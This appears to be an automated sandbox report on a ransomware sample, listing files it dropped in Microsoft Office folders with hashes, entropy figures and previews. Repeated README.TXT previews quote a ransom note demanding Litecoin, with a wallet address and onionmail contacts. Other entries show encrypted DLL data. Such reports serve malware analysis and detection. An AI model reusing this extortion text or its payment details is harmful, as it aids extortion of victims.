                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\Updates\Download\PackageFiles\AAD0B0DB-711A-45EF-A013-BDD28531EC08\root\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\Updates\Download\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\CLIPART\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-core-file-l1-2-0.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):19232
                                                                                                                                                                                                                                                Entropy (8bit):7.988919749585751
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:3cxXNhK3H/zizc+TdEhJ+tfMMkXZwEloGqAMMt8gbl60qjpv2:MOHL6Tyh4ZMMkJj7MWT60Cpv2
                                                                                                                                                                                                                                                MD5:80204D5C11D0E396CA16781B699D6BAB
                                                                                                                                                                                                                                                SHA1:349C36F0B82FDD52A7CCED543D7BE21D5078E0E2
                                                                                                                                                                                                                                                SHA-256:D31F939BE12ACCBF6F02EF14ACF54026A9972A5B8AAA904ED7E78E0F592517CC
                                                                                                                                                                                                                                                SHA-512:7C2A45AE654B2EF7DCF407ED5BBE65305C4008E583330571EFC0DCAB5917EF7E4BBDC5A22E0BA3A21E9DE87B606EC0D1E3CB224B8ED5280A23FA6CDB73059995
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:p...a..v1.)~)...}..6./.....IR..F{S?<..|.VG....h.v.......(>0Y..FaW=0.$.P..za.Kmh..]../E.G.ZUG.mCH.H..K672wZ.W.75..A$C.d..P..I...-..5b..'|.=..S.|.B+.H^.....)."..~....-2.GS.b[.-F...,K.....3....z........V.#..9u.;..H.yG...`*.w..I...8.kZ../..4..z}....uP).Y......a.}P.P..MF'N0q........P.R.].1{L.p;...?....G.P%W.e.r[....0...e~..7....C.....J.."0n....57...P..s..@..ye0.MI.Ev.|....A......+u.....+...k.a.(Qs.I!....=;...";.>R.U.y..8.....0]....|.WE._....I.....b..!.W.i..b....c.y..iP@..Q ...^...F+.m.....}.....~..e....n..RXN.O..&d.t%-..6..T...'..K.P.5.ZIA6...........[.#;.......-P.z..\....R..q]?.@R.F+.0.Y...bbh.ds\...Z......,~^&.3..X.IZ.i.e..;.A)..._.P...i...[.R.y...e..i.......!.N.........u"..V../.m.v..i....+&u\.U.;....2<H..C..9...Sed.W.Y!.'...d..2......D>YF ..Y.:w......g....^.~.....6".{Y.R.3..Q..Cv.L|.Z......8.~Q.B....K..{.7..r.)...q(.......4.+I..@j....D\p.6!..'..;......Z....6IY..k.}.y...@..:...K..4D:.k.....b.hy....a.m3R...l ......7.....T........s..<......Z.w.`...a..

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-core-file-l2-1-0.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):19232
                                                                                                                                                                                                                                                Entropy (8bit):7.990630296940776
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:KH/VTRXdGNw/dcxEwsABRpfmSqAUn7BDr40QTIJjR/IkvCOt5u8o:KBRtGNadn+BRAA+tI0yIzIYCD8o
                                                                                                                                                                                                                                                MD5:AC07DC87CEAAD3BC54D69CD9EC7C0E81
                                                                                                                                                                                                                                                SHA1:CBA5C1D1B733A80FD91F31F04C3B07FA93FBF568
                                                                                                                                                                                                                                                SHA-256:5A78700D46E2AA300D82E5C14E37D2A02414C4A389ACCCD005155703757009D5
                                                                                                                                                                                                                                                SHA-512:9E8733656A8FE1FCE7D8E32725D2B0EBEB3C1F57D80124CD8D225506AB180E1FB5D941BC857ECEAA0AF03382B1F4176ED682CF91372C0B03E3D8D7936F129142
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:#6.Y#1_..^.P....l....D..,..................}.O..7..J..r8$@p..r...{...{.$y..4..*@]..O[in......H6.C,^.h.......t..0.f]N..IV......FE.........(B..l7.<'`.....h.:..S[n.>...D.":....XQ.!.\..%.-...:.5+.<.$L.....D..+...Q...&[.H..o....o.Do...[.VL.J..... ....f.ZS.....m........JX.].^....3Qt.J..+.@9.@..|......&>I@*.|Q.Q.:f.Q.E..DZ.^.$..0.J.3..h......DLz.......L.;..6..&._....9......f.....CQ..OG..5.h.dQ.d^J...d8.Y..d{,..>..k5.<..t.....0K.+...9]lN.A..#......A..i.pU...!L.....AV............y\....g........q.6.......N.=....5.\3=~.fy......p}.....//g....T9.;ON .L..n......k...xB...!..[.ZH..g..o)....Bk..^?..,2.F..o.{..!t.ju. O...].F.X.........(X.........m.-pHKQ...sE....J....j.t.:srP.....SA+.{.].a!...P.....KT."(......... . .1./...>.F..+.... e...z.6.._..d....M..&.,.|~u....O....f.B._......^.....L.....tn....B......)ii.........E]x..O...j...T.$..%.<..Pb2n)..X...N.h....>..*..|Q-..IU.}..+u.'...qV.......ak.!.&.j.jDk..kN.U.b..nt"$.7%....5B-...;_.+V.X~..RK..*.j.<v..

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-core-localization-l1-2-0.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):21792
                                                                                                                                                                                                                                                Entropy (8bit):7.991596498614044
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:lCBO6PU2V0ZIOLbCGO6tvF+0HV5dL5Eo4Eoq1dVgjrzar:bZZZvLu6tvn3hylEVVgDar
                                                                                                                                                                                                                                                MD5:B88A43242CB0F59972BA7E7044E469B2
                                                                                                                                                                                                                                                SHA1:602998B10B1FF1BBECD43294CF30C06AA88DAD75
                                                                                                                                                                                                                                                SHA-256:A663BE4C8840DBDEBA6E182AEE88E8D4A85685D5D097FF66814298B9897B0B1C
                                                                                                                                                                                                                                                SHA-512:87B454C1E55D10F755C2270E4E80161FF80F77531F6491776303E0F01AD63DFAF5A12C78B03DF7BB7F819F9AFFB950D38ED5697453D072E8C5A9BE3DFB823C3A
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.a....y..XP[}..w`X^..8.:.. )..*.n....L...3.....<c.K...a.*....z>.....8...k.....p..p..: ...r....W...;Lx.....3...../..9}...(...c.:(....#X...xsEx.|....}.0.Yw.,....c.....H...a..z...o.u...Z.s.6.0..i..n....:............j@.......z2/C.d..........'F...Ib~(qS...{..Yf].: .c`........Z...(.iQ....I..M...W.J)!...ew.8H.ps.oP..Uq..........?|52.8.......@...o..?H....6|....D......3\.G.T.c+.t....(\...,d ..`..F...1.q..l...)....A.h<h..?.1c.xU9....,....o..8...7.t...vR.....{.*7....8.>Z.-.Pp.2.......A...^..^X.u..V.T..y....e...!g...P;t....:R....+m..(..^.Q.;u!U.g..M......._. .Z...N../..>.^z+<.o..J..Ou.dmO...X...."t.l.2D`?.x'1..b..........fnSt...F)...".....Fw-.I...i k.~...7B.....Fd.....|..O/q...!yK.z.!...'.....r.P..n.._.~>:.D..Y...B..j~.~...,...#...0..;...........9zi...#%.@.II.F...](.n`uQ.pX.P.-.v.-x...o....s..$.|.$$..>.....[./TI......e}..c..... o..Y.-z....".M@.G,.b....._u....k....LI{.Nt.5.u./.#.r.>?..d.....).U..p..~......N..f........:Q...)..Mz..c.H...\..

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-core-processthreads-l1-1-1.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):19744
                                                                                                                                                                                                                                                Entropy (8bit):7.990967755369809
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:PVBqpsck8tDfnGG0+mjqqVDn16ljAfsv6xsDAdTe1TgmwUa:PGsck8tS1zjqqB1oj2sDA1bmFa
                                                                                                                                                                                                                                                MD5:43E2031686ACE0E9D18DA3E08739E5C5
                                                                                                                                                                                                                                                SHA1:1B024E3FE8403CBB370E024BBF3CC2A16944794E
                                                                                                                                                                                                                                                SHA-256:240CF204120467F3704DDFBA20FF812EC934AEDE023C30234085F207BF60D534
                                                                                                                                                                                                                                                SHA-512:03B0082EDF41001B65B7887A4368CE7903269742AEFF3A56EE9DAAEADC6F2E3BF5F8BEC136BA2076552BAEC41233B004394E498C334A78E2D51A525121E7C860
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..>.6v]3..cbg....|..&..G.......f.....W/S...<...p.w.W..{gb...C>.O.`[.C.._P..3.ef..t....~({..r........i.......w.CA..U).i..:...WZ......s2.D.....gH.R0..fij..!,..... u..Rv).~gc=...#H@.P.3...z...dAi....R.... ..7V..."nBu...KJ".RY.pT.r./...%m.).iDX..>......$...c...:Z....} ..nQ/...G...w.f.]A..0.$S...w.Ma.. .t....Q.s[D<..2....MZoU..v$....1b........0t~.s.....,.`.(...y...E...zU..(....W.&.X.9.o.[f[.-..(..X4=..&.8\.....H7w..~.......Z.*..s..Y......>.I..~/.Kh...~.....-E`.\...U%..}.l..c...@a...d;.=.71..Z.s.t....>a<....<.G.uV.].0..?.@.B..ID...b.p.pmUI%z.y._Y.q.z{..1.=g...)....yo!A...`AzY........D.r \..$..{g...\E.o.I...W..;-......5...I.q....`.|....1I".`.T.8j1$....sd.#......6gz.........T.....P.......W^L.`lG.wA.."G..K...l.S.S&...u.......5..D&P_`.(.i`B..E..........M..`.L.>.....F.eH:I.*q..s........q.V.2.UK...3.fnl..81..*||..K..NQ%>...H.+..t\.........:......<.1zo-.....r._.M...B....%..._.@...w..R3U..v..s.v%......./.$.y.R......M.QQ...v.......E.}#_.~4x......

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-core-synch-l1-2-0.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):19744
                                                                                                                                                                                                                                                Entropy (8bit):7.988685778346447
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:p8KFIuXQjNxzmOZA6MH8XYDkgacwJG2sEAfcA8pyBlswHUbmRtgs:p8QIRjDKdcIgNcwJG24t8KLROs
                                                                                                                                                                                                                                                MD5:A85DEF06CEB601D1F0C54EB6D1E72E5B
                                                                                                                                                                                                                                                SHA1:FFE586D1424468D86C4C5FE4299AAFAB54305290
                                                                                                                                                                                                                                                SHA-256:2C62CEDD40C2AABCA73C60CF161CB99A339CF6B12E7F76B9F7A9B53A12414950
                                                                                                                                                                                                                                                SHA-512:204D6C9C7B6DE4666E274F36F031C90C43D36282F3D7CE00C0EBF7051E6F8E6CA9F805D01C40822AEBDC1ED752BD8EF17B916F7A0F5C455E4C1601D01CDCDF69
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:s;..V-A&}.y.#.aX...y7.?.9......]~.Ecu..3.!.$.....!U....T..z.H....'..-.2.G=3a.t.....#6QK.S..T....Y.+.NX.Ba...(...6....._......G@...Pq.n..B.W..;T.^e...j.m...j.........d....,.......N...F..f8Lf..>.b.:"...[.!^...G...wR..q.m.&.FLG.:f.\...._[...BwUc.!...l..[C'R.l...N.U0....Q.F..Q..!.2.\..&....."a......SZ17.4...B.A/....t.1Lv...)J..b....V4..1.....H.uh{@nm.U.8.|......V$....<1..{...f\Kx...u....wF%.&...j.C.UJM../..@..A........K85...=@.QF.9.qA#V.6l....qvs.1....&..;}..I8X....... \LJ...).(.....P.%.......{.......*'"G,E7(*fl....T0f...J.....0....j@;."a2#...>.)W..<.}*........N..&....i.>..;`....l.|E...Q.k.T...B....[.#.W.2L......S..&...k.VX...6L.(}jU...t./.C.be:N$..&..+., ..'..],|C.W..A.......o^X%XS..\.o...e..3T.{.)N...p..@.....nK.#.i...t9..9r....d.G..`.m>;B..o....F.A.2S.!gA..D2..k..i..,(z[v6w.....8.p..e........#2.u.... {...T.V6n..l....,...1>u.......w07...D....{.9u..;.S..k..?.+.7.{m..*.!......VT....:ZDF........y...%x5zN...,...;h(Vd...J...%0..o[...F...

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-core-timezone-l1-1-0.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):19232
                                                                                                                                                                                                                                                Entropy (8bit):7.989877688476598
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:dfO0kl/CUhzcEahnFN1fZCC48kS5JJ837CukxVTsCfEVolKh:dG0+/C8cEmFrZCC4g5JJyutHTsCXlKh
                                                                                                                                                                                                                                                MD5:AD30AE6C42C7B24A95273D9C6C15FABA
                                                                                                                                                                                                                                                SHA1:B44A49CF368B617D1650D1E90A57B94139298B79
                                                                                                                                                                                                                                                SHA-256:A696ADE941A8718B4EF10BAB0765F1DE2EF767D274BC1E50ECBED13FC412F429
                                                                                                                                                                                                                                                SHA-512:E88DDE715ED27061B6FBE9875DFF492407C8B980DB84DFB1527243F6E250AE9128D68EF7956B912E6726827B7E85849530B474A1BF80B027651A2C1141040DB3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.qi9..$..m~^.).......Ac.-...u...'................&..ju/?31.@v...VA.4...p..,}...[g..h...n..l..C"i..~5.q...;"...I.H...%..i)-...Q.P.[.(..[...F.......G.FF......2.. .P..k..eA..H.\..E...)..T.L2It%%\........)R..r.a!J.......[^...O._9.E...J6`..`....Fq....-Ql..&2.!.O..._...t.F.T..n.X......@.....?...Q+P*..a..,.Y.......A...?0._..S..H.p..@...o..-..,^ke.a._..C.,Orz0...M.8.....<U"...2(..w.9c...a..`(..vZ..45..7.!.+..a5.H..w.'..8.D>..\.(..7........w...0......2..7...VA...t`.....U...6..f......Ew.".J.........ITG `..XU.Z!$.[.r.P4V/.[.c.v{..H......O..@.n7f...w%...-N.q...V...I.(a..s.;....1i 5:..a..<hf]%.A..)[....:.m.Jd.&r.xPk..zP."..[..{.;..EX....9.n.D8.&6.K...2%(..?(..eU..w...1.%..*.,4.k.....x...J.mM.).f.A..>...: cZP.`...(.m...h.?O.D.$`..9.Dh...W.....t...s.V>-G9.)..............._..`9.8\.3..t4o\..i..6..I..2..W.a...O0.~.9&..gU.......v...v.w...^.O..\.c|*.......s...L..@.....z.....Q.h........_..8...o).S..w..q..a.v'..Y2.t(,.G34....C....vK..96_W.4../!S...C.....0..x...K..

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-core-xstate-l2-1-0.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):12224
                                                                                                                                                                                                                                                Entropy (8bit):7.983346104634389
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:DD+QdP3vkOla5GgJvjDX8C98PJnNfmZ1q0Nj5rjCjrL+TVqqnj1Xnv0I66pVrSUW:DzdPvkaa5z1vX8C98RnNeZzM/+VNnj1C
                                                                                                                                                                                                                                                MD5:F6019A6EBE294F1F82DF5A4C718D2056
                                                                                                                                                                                                                                                SHA1:E09661F10D4AFFCF11DD0DCF1320AE65A7401B39
                                                                                                                                                                                                                                                SHA-256:32C276518BCC2CAC6D112D3D92FD9B75C6FC8AFBFD0CFB80A6E7247015848A0B
                                                                                                                                                                                                                                                SHA-512:BA19451F24438EBB5DF6B25B5B9C383190B5DBF56F16992E07061EE91C56BBDDEB07243B9C11F6B8A7AD5C4A7405E7CD7739BF3418B105290F19837511771A22
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:T......rOS...]t.%...q....26....*.[..r.....sJ..$....-RtI<4O7...H...., n...38..o.t.b....B...3.N f.g....q....W..0..IZ....{.4dhI._...C<....|O../3..2.6Ya..z.....J.w.9......q.]........k....5..+...#...K3.V.i.R....}......6.~.J.....-t......._.j..Y..-...5.M.....@.p..VP...,[......vQ.....Lu.........bo...).....G.P.e.E..?.....ui...Au_v7p.V|..d.......i(.........|(=..~..sa.Qm`eky.D..W2F......W..g.w0.i.K..*...\aO..,gc.....ERG..%HF........U..V......!.).=...).E.&..i........:.-..v>...QT...JN.7.,W.].....No..(.......l..d.u...b.!..T.....u\.x;...8.8._#.y_.`&...)..|u..O........~G.g...H..i...].b..u...&...H...)nf......"l...j.Q.u.`j..G.?3...J.p..c./.,..../..u..g..d..VJ........)8}.4.....iT....h.IG;.7L.1..6....4xM.jy..........|.j. ....2.....'.....R.)..xaJ..~;....K.j^8...... ..?....8@$.G."VF..B.Me...G:..7..E5::.%T.o....<..2.7!.>..X.7....u..JnU.e......^...ql.\...+....d.l.c.Q8[.o.4m....C.IR.{.B..z....ML.........,..o.5Q..[..v.'m.SX.K....Oy...{........(........_.

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-crt-conio-l1-1-0.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20256
                                                                                                                                                                                                                                                Entropy (8bit):7.990426650939697
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:bCqIT2kwgAOKSc71wAhoojQulnPuPNRFsnIrUoNmPOdBt35f:bCvPw7OSculnPuPNRtRmPOnf
                                                                                                                                                                                                                                                MD5:0B95246B14D4B6FE0E09FC99FF3E8622
                                                                                                                                                                                                                                                SHA1:DDA0A2D22AD0281D9AAD9C78D4CD8346ECB5B43A
                                                                                                                                                                                                                                                SHA-256:BD928E99187DABDC878B58AC02B8FB36A383FA2362D41083193CB68B89CB1C6F
                                                                                                                                                                                                                                                SHA-512:56A3F9E4F78745D1A9EE34EDCD1D78368E95CE201DACA72525799D976AFA20D0EB0790FE68CF8A4E081291D9DA5C0BB4891CC95D76C05B183A900140EE997C13
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...j..\;.'..:.l.n.G..\..A..B.zyZ...V..d...(/9......o..UBT..[....V..h....H....2$...../..`...=E#.p.y.Y....<.....T.....x.#....xo,_....a#.s..%.|....+...&. ..\:.Dn...Py....s..wW..L..1...NE..E.b.,..%n.@../q.~..o.4t.0=....&...afH.m....2..|9.>.B.fJA.\.~..../..O.E.g. .#.x..x.Ng.y. ....D...)sj.....r....c......|0..w.......,..q.NAS.#dC.,......+.?e....cNp.b.(J..:.G....,yD......B...X.......=..K...J.Ys.Dr.dl.R.m'v....P;G...;k.].0>.k..O....u...t....._.5.3,..!'....XD.A^u7..v....z..\...pUq.0...[r.m....)t...mF....RA"?..n.#IQ..&y.:..86.@y...7+.H..U_....#)....}\Q.I.....p....v....e..u2^....C.l.]....:h>Z....A...7...e&..uO.G..xE..<. ....=...j.q....sS..X?'.pLe.".=.....c...9.(..........U.B..S..Q'Lb~f(Ci.D.GP.....&q...".jq.p....o.;...=:......O..q=.Y..._.,^.8-.%...(...^.c..o[.<Zg.M4..#...>...7...z..K.......].)....8^.s....{...,/..5.h..#...x. _.5.)@P.........b...P..,...nR.U.S..'.9......;uI-bO......@g."......"....Po&3...&.G.2..Gs...].=..7xD..t.8~uv../..a...1.)....

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-crt-convert-l1-1-0.dll

                                                                                                                                                                                                                                                Download File
